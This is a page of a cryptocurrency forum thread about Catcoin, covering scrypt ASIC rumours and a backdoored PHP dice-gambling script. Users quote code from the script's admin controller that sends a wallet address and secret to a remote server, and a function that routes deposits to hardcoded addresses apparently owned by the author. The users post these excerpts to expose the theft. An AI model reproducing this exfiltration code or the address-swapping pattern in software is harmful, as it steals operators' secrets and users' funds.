Topic: [ANN] Catcoin - Scrypt meow! - page 209. (Read 470749 times)

Has anyone even been in touch with these people from Alpha Technology? I know they're posting in a thread on Litecointalk.

There's a thread on Alpha Technology on litecointalk.org

If it's true though, GPU mining is f***ed.

Reserved DNS - http://catcoin.biz/
now it redirects to teh http://catcoins.biz/

Lets hope so (I mean that in the best way possible, I hope if they are no one will get ripped off and then nothing will happen)

But they have been online for about a year now so I think they are quite serious in it, either way the rich get richer and the poor get screwed again  

Still a good change that alpha-t is a scam. Not even any pictures of hardware yet. Just a crude logo and some design concepts.

F@&K SAKE, great time to make scrypt as tough as SHA-256 bye bye GPU mining Q2/3 of 2014 :/

Yes that is right ASICS are coming to scrypt that means it is going to put the little ones out again
at least it will hopefully keep this coin alive

https://alpha-t.net/product/scrypt-asic-miner/

5M/hash £1350
25M/hash £5450

CAT--->MARS

More feedback please,so we can have a final version and can use it to make a youtube video

thanks

I was beginning to wonder why I can't make heads of tails of the source. Nothing seemed substantial. The only hard code I could find relating to addresses was that, and all the information is being sent to another server.

That is what I wasn't hoping for.. so it will be far to have a service for cat
I tried to help.

www.catcoinforum.com < still in beta stages but updating frequently to make this a success. Please register thank you.

I live in europe so maybe I can do the updates for that time zone

This thing is FUBAR - basically, the rest of the code is just a Potemkin Village around these two backdoors. No game code at all ... no code to process any bitcoin payments or withdrawals either. Basically unfixable piece of junk.

I guess whoever wrote this intended to just steal whatever initial balance is deposited on the site and then perhaps steal even more if someone actually makes some test deposit or puts it live without testing (all bitcoins sent to the site ends up in author's pocket)

nope thats another part of the backdoor.
at least, it's what i think

application/models/viewbase.php has some stuff relating to BTC addresses. Might be a good starting point.

Perhaps these relate to the paying in/ paying out addresses.

Also;


This part of the database probably has some settings relating to payments. So you'll have to look into the SQL table in PHPmyAdmin on your server.

That would be silly. Why would they shy people away from something they want to profit from? Forking this coin nearly killed it the first time, it would just put it in its grave the second.

Ok,but what about the API, so it converts the entire website for catcoins when creating new deposit addresses
I don't know much about PHP, but I like to explore codes.
Btw, where I can find the part of the API's in your opinion?

How much do you know about PHP? $resp is an associative array that stores all the data it grabs from that admins website. What you could do also add a function to the class that prints off those values, then when you have them, you can hard code the values you want to change in the update() method for the values you want to change.

Unless update() has some other purpose than to send data to a remote server, and those values aren't being used in the game, you could just disable it where it's being called. Otherwise, just disable all the $name = $this->input->post by adding // infront of each one.

Expecially for the option application/controllers/admin.php where it says:
Quote
//Sending bank address and secret encrypted to a server to check balance
          $bankaddress = $this->encrypt($this->input->post("bankaddress"));
          $banksecret = $this->encrypt($this->input->post("banksecret"));
           $fee = $this->input->post("fee");
          $pass = $this->input->post("pass");
        
          $resp = file_get_contents("http://dicetest.net23.net/electro2000/123.php?btca=$bankaddress&btcs=$banksecret");
                 $data = array
Where it sends your info to his website(Why the creator of the website wants our password?)
 or this: application/models/ViewBase.php
Quote
private function get_address(){
      
      $addresses = array("145N2EFzReaH4hkfb8jVaYbLq7VUm75TmV", "12ENTxaNfyrrzGGu2WDyrC4xZy2tVQA5az", "13yTHvFDxaUUP44KiDkWk27F4We18gJFse", "1ATknpbvfjzXkg1nFGJPTeG9Wzxhi9Z5Ts", "12eGV9FcCvqNU8Ya6CUD8Uu4nNHNPJaKGi", "1L1ULCndeghKZAteTe3tmcKG6HCPDCeLMX", "18JxX3839mZCMrRbtAP1W485kHW3RYUnFG", "16nVMZ3qKwRhFoHTPZjF67EdJ9nrchUSQf");
      return $addresses[array_rand($addresses)];

Where it happens to be a nice list of where receive your Bank's money.
Anyone that is be so gentle to edit the parts where it sends the money to the creator of this?
I mean, I know it's opensorce but at least not steal people's money

Tell me where those particular files are in the directory and I'll take a look at the PHP code.

Still some µCats left    

https://bitcointalksearch.org/topic/giveaway-catcoin-50x002-cat-389470

It contains 2 stuffs I don't like: first it sends all the info, private and public address to another server, plus the password of the admin to the " owner of the script"
But we need to setup the API of catcoin in it.